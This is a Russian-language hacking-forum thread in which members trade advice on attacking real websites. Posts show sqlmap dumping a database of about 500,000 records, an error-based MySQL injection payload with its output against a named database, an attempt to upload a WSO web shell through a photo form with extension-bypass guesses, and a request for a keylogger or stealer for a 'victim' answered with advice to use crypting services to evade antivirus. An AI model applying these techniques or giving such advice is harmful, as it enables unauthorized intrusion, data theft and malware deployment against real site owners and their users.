Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    
     
    _________________________
    foozzione likes this.
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Та по-моему кто-то морочит голову...;)
     
  4. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    --dump-format=HTML --where=С:\
     
  5. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Code:
    Parameter: #1* ((custom) POST)
      Type: error-based
      Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
      Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
    ---
    [19:45:19] [INFO] the back-end DBMS is MySQL
    web application technology: Apache, PHP 5.3.3
    back-end DBMS: MySQL >= 5.1
    [19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
    [19:45:22] [WARNING] the SQL query provided does not return any output
    [19:45:22] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q]
    Пробывал и no-cast и --hex не помгает
     
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Y
     
  7. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    это понятно что Y ) Почему не хочет определять таблицы,Если перебором то стоит префикс и ничего не находит
     
  8. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Это и есть ответ! information_schema ведь отсутствует...
     
  9. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    зачем плохому учишь)?
    --where это условие для дампа, то есть --where="id < 1000" , удобно когда 100к записей, ну или нужно сдампить что то определенное, по сути просто добавляется sql условие where
     
    _________________________
    foozzione likes this.
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    подебажил
    для __set не передается класс Session поэтому отрабатывает это условие

    Code:
    if (!isset($sess->user)) {
                $sess->user = new User();
                $sess->save();
            }
    
    крут что сказать :) я не додумался до этого
    правда туда всегда передаётся объект User...
    честно говоря пока сам в режиме рандома -_-
     
    _________________________
  11. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    да про where я знал, так что не особо принял во внимание, тем более в *nix системах это все в ~/.sqlmap/site.ru/output_db... хранит по дефолту
     
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    у тебя там похоже Time-blind начинает раскручивать. Как вариант можно попроовать в sqlmap раскрутить в булеан блайнд , он побыстрее идет ,а может даже и union будет
     
    _________________________
  13. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Нужен кеилогер или стилер вирус чем создать?
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    в паблике ничем, ищи сервисы по криптовке чтобы авир не палил
     
  15. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Автор этого задания гений или наркоман со стажем, сложно представить как такое можно выдумать. Я до конца не понял почему это работает, но флаг получил :)
     
    t0ma5 and erwerr2321 like this.
  16. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Да у жертвы нет антивируса посоветуйте любои
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    автор некий HoLyVieR, у него 4 место в рейтинге на рингзеротим..
    я пока забил.. прохожу другие кейсы
     
    _________________________
  18. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Hi.Заливаю Shell,но тут трабла копирую url .
    site.ru/usffoto/60/20170123104851wso2.php
    захожу и всё равно выдаёт 404 ошибка
    Пробовал так :
    site.ru/usffoto/60/20170123104851wso2.php
    site.ru/usffoto/60/20170123104851wso2.php.jpg
    site.ru/usffoto/60/20170123104851wso2.jpg.php
    site.ru/usffoto/60/20170123104851wso2
    site.ru/usffoto/60/20170123104851wso
    site.ru/usffoto/60/20170123104851
    site.ru/usffoto/60/20170123104851.php .
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    phtml?php3?php5?shtml? или произвольное расширение?
     
  20. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Пробовал щас phtml . Забыл упомянуть,что при добавлении пишет ошибку : Warning: imagecreatefromjpeg() []: 'usffoto/20170123110107wso2.phtml' is not a valid JPEG file in /home/www/*****/***/addfoto.php on line 226

    но также и добавляет фото :
    Ваша фотография успешно добавлена
    и в меню фоток этот шелл видно,но 404 . мб ты сайт увидел ? :D